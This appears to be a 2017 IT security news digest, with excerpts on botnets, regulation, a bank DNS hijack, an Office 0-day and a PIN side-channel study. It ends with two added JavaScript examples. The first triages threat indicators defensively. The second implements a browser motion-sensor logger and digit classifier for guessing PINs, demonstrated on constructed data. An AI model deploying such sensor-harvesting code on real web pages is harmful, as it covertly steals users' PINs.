IT Security News Blast 4-12-2017

Few Americans understand cyber security, study finds

Seventy-five percent of those surveyed could pick the most secure password out of a list of four options, but 73 percent weren’t sure what a botnet was. “A botnet is essentially thousands or hundreds of thousands of zombie computers: computers that have been taken over by an attacker,” said Jeremy Johnson, Director of Offensive Security Services. […] The Pew study showed 73 percent of those surveyed understood that using public wifi, even if password protected, is not always safe for sensitive activities, like banking. However, only 48 percent were sure what ransomware was. Johnson says that’s when a hacker encrypts all your files with a password or key that you don’t know.

Regular risk assessments can help mitigate cyber exposures

The regulations require cyber security standards for any entity licensed or similarly authorized by the department to operate in New York[.] […] The most key element of the regulation, Mr. Taft said, is the risk assessment that companies conduct. “Everything effectively keys off the risk assessment you do and how you handle the information gleaned from that assessment,” he said. “So obviously, it’s important that people do a risk assessment. Unless they do a risk assessment, they’re not going to be able to basically tailor their policies and procedures to the risks that have been identified.”

When phone systems attack

Around the country, many agencies in metropolitan areas are moving or considering moving to consolidated, regionalized models for their public safety centers. […] Using the NENA i3 framework, NG911 offers a modern approach to network security and protection based on an IP-based architecture and capabilities. In fact, cybersecurity remains the greatest concern. With new multimedia, multimodal methods of communication that will receive not only voice traffic, but also text messages, pictures and video from public sources, network design and implementation must address segmentation, detection and isolation of potential threats in addition to resiliency and reliability.

Bank gets lesson in the security failings of third parties

We’ve all been warned to make sure that the sites we visit are the intended ones — not altered by a strategically placed typo — and those warnings are especially important when it comes to banking sites. Attackers, of course, know that we’ve been trained to be wary. So the Brazilian thieves didn’t attack the bank — well, they did, but only after they had attacked the bank’s DNS provider. That allowed them to purchase valid digital certificates for the bank’s domain. Then they attacked the bank, planting malware that disabled antivirus apps.

Cybersecurity jobs are there for the taking. Are you?

“Only 7,533 jobs were added on average in this period compared to 11,533 jobs per month in the first nine months,” he wrote. While he pointed out that a three-month span is insufficient for a true analysis of labor numbers, still, the February results indicated “volatility and uncertainty in the marketplace for U.S. tech jobs.” Foote’s conclusion was that companies are cautious about hiring on full-time staff for technology-enabled solutions they are experimenting with. Rather, the call is going out to consultants and contingency workers to fill roles. This way, enterprises can remain flexible as they develop their security implementations.

Similarities in partial fingerprints may trick biometric security systems

Using commercial fingerprint verification software, they found an average of 92 potential MasterPrints for every randomly sampled batch of 800 partial prints. […] They found, however, just one full-fingerprint MasterPrint in a sample of 800 full prints. “Not surprisingly, there’s a much greater chance of falsely matching a partial print than a full one, and most devices rely only on partials for identification,” said Memon.

That Dallas Siren Hack Wasn’t Novel—It Was Just Really Loud

The Dallas incident fits with the broader uptick in infrastructure hacks around the country. From electric road signs to emergency text alert systems to suburban dams, hackers have targeted vulnerable structures with increasing boldness. And while the Dallas sirens did have some alarming secondary effects—over 4,000 calls to 911 flooded the city’s emergency response lines for several hours—it’s nothing next to the real danger that hacks like these could cause.

How the Denver Police Crack and Search Cell Phones

Cellebrite’s UFED, as the device is more commonly known, is the leading model of mobile phone data extraction tools in law enforcement. Denver PD purchased a UFED Touch in January 2016 for about four grand. The Touch is used for cell phone data extractions done in the field and was infamously rumored to have been used by the FBI to crack the San Bernardino shooters’ encrypted iPhone after Apple denied their request for access. […] That Training Bulletin we got does a fine job of explaining just how potent these devices are and how they are used.

What the Heck Are These Electronic Devices in Trump’s Situation Room?

Vietor also reminded me that Trump’s staff has a history of bad infosec. When North Korea launched a missile test in February, Trump and his aides—also then at Mar-A-Lago—used their cellphones as flashlights to review sensitive documents. If you’re drunk and trying to find your keys, this is fine. But when you’re a federal employee, hovering a camera-phone over classified information is a security disaster waiting to happen.

“Unenforceable”: How voluntary net neutrality lets ISPs call the shots

Under ideal circumstances, this could prevent ISPs from committing egregious violations of net neutrality principles. But “voluntary” isn’t just a euphemism—ISPs would only be bound by net neutrality requirements as long as they promise to follow them. Even if all ISPs put the promise into their terms of service agreements, it’s not clear what would stop them from removing the promise later. If any new ISPs enter the market, it’s also unclear what would compel them to make the same promises. And those aren’t the only problems that would make net neutrality enforcement more difficult under Pai’s proposal.

Rollback of FCC privacy requirements could have broad repercussions

“In an era of the U.S. government focusing on alleged wiretaps and cyber spying, we are now effectively handing this same data over to broadband providers to sell and share as they like,” he said. It’s not just marketers who might want to gain access to this data. “This information provides context around who we are, what we think, where we go and what we do,” said Jeff Kukowski, CEO at SecureAuth. “The potential misuses of this information in the hands of attackers is concerning and therefore needs to be critically protected like any other identity-related information.”

The Human Point Of Cyber Security

Twee marketing buzzphrases aside, Moynahan’s point is well made: while security vulnerabilities in IT systems themselves certainly exist, they’re put there by the humans writing the code. The vulnerabilities are a problem largely because other humans seek to exploit them to nefarious ends. And your human employees are a vital link in being able to exploit these vulnerabilities. Clicking on a link in an email that starts the exploitation process (known as phishing in the colorful InfoSec jargon) requires a human being to take action.

Budget woes hinder US cybersecurity buildup

Lawmakers are expected to pass a continuing resolution (CR) later this month to avoid a shutdown and fund the government past April 28, when the last spending deal expires. Analysts and officials say the use of a continuing resolution hinders the federal government’s cybersecurity efforts, delaying and damaging the work that is being done across various government agencies.

All the World Wide Web’s a stage: Understanding the actor in the cyber threat landscape

IoCs tend to change very quickly; the actor behind them does not, nor do their objectives and tactics, techniques and procedures (TTPs). For example, US-CERT’s release of the Grizzly Steppe malicious Russian activity was complex in that many of the IoCs that were provided were false positives or TOR exit nodes, making it difficult for companies to make sense of them and ingest them. As such, it’s vital that organisations look to understand the actor – their motive, opportunity and means – and not merely read into the IoCs if they are to protect themselves from potential attack.
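The Tor-exit problem described above is cheap to catch before an indicator list ever reaches a firewall or SIEM. The block below is an added example written for this digest, not code from US-CERT or the article: it tiers each entry of a constructed indicator feed against a constructed Tor exit-node list, then runs the tiered list over a few constructed firewall log lines so that low-confidence hits become review items instead of alerts. Every address (documentation ranges), the exit-node set and the log lines are made up for the demonstration.

```javascript
// Added example (not from the article or from US-CERT): triage an IP indicator
// feed against a Tor exit-node list before it reaches blocking or alerting.
// Every indicator, exit-node address and log line below is constructed.

// Constructed indicator feed, in the shape a bulletin appendix might ship it.
const INDICATOR_FEED = [
  "198.51.100.7",     // single address, not a known exit node
  "203.0.113.0/24",   // an entire block: blocks shared infrastructure too
  "192.0.2.44",       // present in the constructed Tor exit list below
  "192.0.2.45",       // single address, not a known exit node
];

// Constructed stand-in for the Tor Project's published exit-node list.
const TOR_EXITS = new Set(["192.0.2.44", "198.51.100.200"]);

// Constructed firewall log lines: "<timestamp> <src_ip> <dst> <action>".
const LOG_LINES = [
  "2017-04-11T09:00:01Z 198.51.100.7 corp-mail:443 ALLOW",
  "2017-04-11T09:00:05Z 203.0.113.17 corp-vpn:443 ALLOW",
  "2017-04-11T09:01:12Z 192.0.2.44 www:443 ALLOW",
  "2017-04-11T09:02:00Z 10.0.0.5 www:443 ALLOW",
];

// Dotted-quad IPv4 to an unsigned 32-bit integer; rejects malformed input.
function ipToInt(ip) {
  const parts = ip.split(".").map(Number);
  if (parts.length !== 4 ||
      parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error(`invalid IPv4 address: ${ip}`);
  }
  return ((parts[0] << 24) >>> 0) + (parts[1] << 16) + (parts[2] << 8) + parts[3];
}

// Parse "a.b.c.d" or "a.b.c.d/n" into a network/mask record.
function parseIndicator(raw) {
  const [addr, prefix] = raw.split("/");
  const bits = prefix === undefined ? 32 : Number(prefix);
  if (!Number.isInteger(bits) || bits < 0 || bits > 32) {
    throw new Error(`invalid prefix length: ${raw}`);
  }
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return { raw, bits, mask, network: (ipToInt(addr) & mask) >>> 0 };
}

function matches(ind, ip) {
  return ((ipToInt(ip) & ind.mask) >>> 0) === ind.network;
}

// Assign each indicator a confidence tier before it is ingested:
//   "low"   a Tor exit node, or a block containing one: the address says
//           nothing about who is behind it, so it is noise for attribution
//           and a false-positive generator for blocking;
//   "broad" a prefix wider than /32, which will also hit bystanders;
//   "high"  a single address with no known reason to be shared.
function triageIndicators(feed, torExits) {
  return feed.map(parseIndicator).map((ind) => {
    const torHits = [...torExits].filter((ip) => matches(ind, ip));
    let tier = "high";
    if (torHits.length > 0) tier = "low";
    else if (ind.bits < 32) tier = "broad";
    return { ...ind, tier, torHits };
  });
}

// Run the triaged feed over log lines: only "high" indicators raise alerts,
// the rest are queued for analyst review instead of paging anyone.
function scanLogs(lines, triaged) {
  const alerts = [];
  const review = [];
  for (const line of lines) {
    const [ts, src] = line.split(" ");
    for (const ind of triaged) {
      if (!matches(ind, src)) continue;
      const hit = { ts, src, indicator: ind.raw, tier: ind.tier };
      (ind.tier === "high" ? alerts : review).push(hit);
    }
  }
  return { alerts, review };
}

const triaged = triageIndicators(INDICATOR_FEED, TOR_EXITS);
for (const ind of triaged) console.log(`${ind.raw.padEnd(16)} ${ind.tier}`);
console.log(scanLogs(LOG_LINES, triaged));
```

Run with `node` as-is. The tiering is deliberately simple: the useful part is that an exit node in the feed is demoted rather than silently dropped, so the analyst still sees that the source touched the indicator while nobody is paged for what is, as the article notes, most likely a false positive.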

“Russia Could Launch Cyber Attacks That Would Affect Us All”

Speaking to Nick Ferrari on LBC, she said: “The thing you have to remember about the way that Putin operates is that this is not just confined to Syria. “If action takes place in Syria, say for example another chemical weapons attack happened and America responds, it’s not necessarily going to be a linear response by Russia. “They could start making trouble in the Baltics. They could launch cyber attacks against the US, against the UK. And that creates a whole world of trouble which people are going to be factoring.

China’s Answer to the US Military-Industrial Complex

The cyber and space domains could also benefit from civil-military integration. Integrating civilian expertise into the military sector would help China to develop cyber warfare capabilities and train next-generation cyber and space experts. Alternatively, joint development programs between the civilian and the military sectors will also help Chinese companies to compete in the emerging space and cyber industries.

FBI Kills Kelihos Botnet after Russian Hacker Arrested in Spain

Earlier this week, Spanish authorities arrested a Russian hacker and “one of the world’s most notorious criminal spammers,” Peter Yuryevich Levashov (Severa) in Spain. Now, the Feds are working on dismantling the Kelihos botnet used by Severa to conduct his large-scale cyber crimes. […] Although killing the world’s most sophisticated botnet is not a piece of cake, and it may therefore take some time for the authorities to announce the final word, since the announcement was made yesterday we are positive that Kelihos by now is history.

Adobe Patches 59 Vulnerabilities Across Flash, Reader, Photoshop

The company warned in a series of security bulletins posted shortly before noon Tuesday that the bulk of the bugs, 44, are critical and could lead to code execution. The 44 code execution bugs mark an uptick over last month, when Adobe fixed only six code execution bugs in Flash, and over February, when it patched 13 code execution bugs in the software.

Critical Word 0-day is only 1 of 3 Microsoft bugs under attack

A zero-day code-execution vulnerability in Microsoft Office is one of three critical flaws under active attack in the wild, Microsoft warned Tuesday as it rolled out a batch of updates that plug the security holes. As Ars reported Monday night, attackers are exploiting the flaw to infect unsuspecting Word users with bank-fraud malware known as Dridex. Blog posts published Tuesday morning by security firms Netskope and FireEye reported that attackers are exploiting the same bug to install malware with the names Godzilla and Latenbot.

Oh my Microsoft Word: Dridex hackers exploit unpatched flaw

Booby-trapped emails designed to spread the cyber-pathogen have been sent to hundreds of thousands of recipients across numerous organisations, according to email security firm Proofpoint. The switch to document exploits by the hackers represents a change of tactics by a group that previously leaned heavily on malicious macros to distribute their wares. The Word document exploit at the centre of the attack was only discovered last week, so its abuse represents a rapid weaponisation of the exploit.

Side-channel attack technique steals PINs by analyzing smart device sensor readings

As part of their study, researchers from Newcastle University created a JavaScript-based web program called PINlogger.js that uses machine learning to perform a side-channel attack that guesses Android users’ four-digit PINs, based on how they maneuver and orient their devices while entering the codes. A test of PINlogger.js using a sample set of 50 PINs found that the script was able to correctly guess a user’s PIN 74 percent of the time on the first try, 94 percent of the time on the third attempt, and 100 percent of the time by the fifth try.
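To make the mechanism concrete, the block below is an added example written for this digest; it is not PINlogger.js, whose source the page does not reproduce. It shows the two halves of the technique: a web page subscribing to the browser's `devicemotion` events (which in 2017 required no permission prompt), and a classifier that turns the readings captured during one key press into a ranked list of digit guesses, which is what the "first try" and "third attempt" figures above measure. A nearest-centroid classifier stands in for the researchers' neural network, and the keypad tilt profiles, jitter and sensor traces are all constructed, not measured data.

```javascript
// Added example, written for this digest; it is not PINlogger.js, whose source
// is not on the page. It shows the two halves of the technique: a web page
// harvesting motion-sensor events, and a classifier guessing the key from them.
// A nearest-centroid classifier stands in for the paper's neural network, and
// every sensor trace and keypad tilt profile below is constructed.

// Browser half: subscribe to devicemotion and hand each reading to onSample.
// Takes the window-like object as a parameter so it can be exercised under
// Node with a fake; returns false where no event API exists.
function attachSensorLogger(windowLike, onSample) {
  if (!windowLike || typeof windowLike.addEventListener !== "function") return false;
  windowLike.addEventListener("devicemotion", (ev) => {
    const a = ev.accelerationIncludingGravity || {};
    const r = ev.rotationRate || {};
    onSample({ ax: a.x || 0, ay: a.y || 0, az: a.z || 0,
               alpha: r.alpha || 0, beta: r.beta || 0, gamma: r.gamma || 0 });
  });
  return true;
}

const AXES = ["ax", "ay", "az", "alpha", "beta", "gamma"];

// Per-key feature vector: mean and standard deviation of each axis over the
// samples captured while one key was pressed (12 numbers).
function extractFeatures(samples) {
  if (samples.length === 0) throw new Error("no samples for this key press");
  const feats = [];
  for (const axis of AXES) {
    const vals = samples.map((s) => s[axis]);
    const mean = vals.reduce((acc, v) => acc + v, 0) / vals.length;
    const variance = vals.reduce((acc, v) => acc + (v - mean) ** 2, 0) / vals.length;
    feats.push(mean, Math.sqrt(variance));
  }
  return feats;
}

function euclid(a, b) {
  return Math.sqrt(a.reduce((acc, v, i) => acc + (v - b[i]) ** 2, 0));
}

// Training: average the feature vectors of labelled presses per digit.
function trainCentroids(labelled) {
  const sums = new Map();
  for (const { digit, samples } of labelled) {
    const f = extractFeatures(samples);
    const e = sums.get(digit) || { acc: new Array(f.length).fill(0), n: 0 };
    f.forEach((v, i) => { e.acc[i] += v; });
    e.n += 1;
    sums.set(digit, e);
  }
  return new Map([...sums].map(([d, { acc, n }]) => [d, acc.map((v) => v / n)]));
}

// Guessing: digits ordered by distance, so index 0 is the first-try guess and
// the first k entries are the k-try guesses the article's percentages refer to.
function rankDigits(samples, centroids) {
  const f = extractFeatures(samples);
  return [...centroids]
    .map(([digit, c]) => ({ digit, dist: euclid(f, c) }))
    .sort((x, y) => x.dist - y.dist)
    .map((x) => x.digit);
}

// Deterministic pseudo-random jitter so the demo is reproducible.
function lcg(seed) {
  let s = seed >>> 0;
  return () => { s = (Math.imul(s, 1664525) + 1013904223) >>> 0; return s / 4294967296; };
}

// Constructed: how far the phone tips toward each corner key of the keypad.
const KEY_TILT = {
  "1": { ax: -1.0, ay: 1.0, beta: 6 },
  "3": { ax: 1.0, ay: 1.0, beta: 6 },
  "7": { ax: -1.0, ay: -1.0, beta: -6 },
  "9": { ax: 1.0, ay: -1.0, beta: -6 },
};

// Constructed sensor trace for one key press: the tilt profile plus jitter.
function syntheticTrace(tilt, seed, n = 20) {
  const rnd = lcg(seed);
  const j = (scale) => (rnd() - 0.5) * scale;
  const out = [];
  for (let i = 0; i < n; i++) {
    out.push({ ax: tilt.ax + j(0.2), ay: tilt.ay + j(0.2), az: 9.8 + j(0.2),
               alpha: j(2), beta: tilt.beta + j(2), gamma: j(2) });
  }
  return out;
}

// Train on five constructed presses per key, then rank guesses for a fresh
// press of "7". Returns the ranked digits.
function demo() {
  const training = [];
  for (const [digit, tilt] of Object.entries(KEY_TILT)) {
    for (let k = 0; k < 5; k++) {
      training.push({ digit, samples: syntheticTrace(tilt, Number(digit) * 100 + k) });
    }
  }
  const centroids = trainCentroids(training);
  return rankDigits(syntheticTrace(KEY_TILT["7"], 4242), centroids);
}

console.log(demo().join(" > "));
```

Under `node` the pure half runs and prints the ranked guesses for the constructed press; in a page, `attachSensorLogger(window, buffer.push.bind(buffer))` plus a timestamp per keyup on the PIN field is all the attacker needs to cut the buffer into per-key windows. The point worth taking from the example is that nothing here touches the PIN field itself: the leak is entirely in sensor events that any script on the page, including a third-party one, could read at the time.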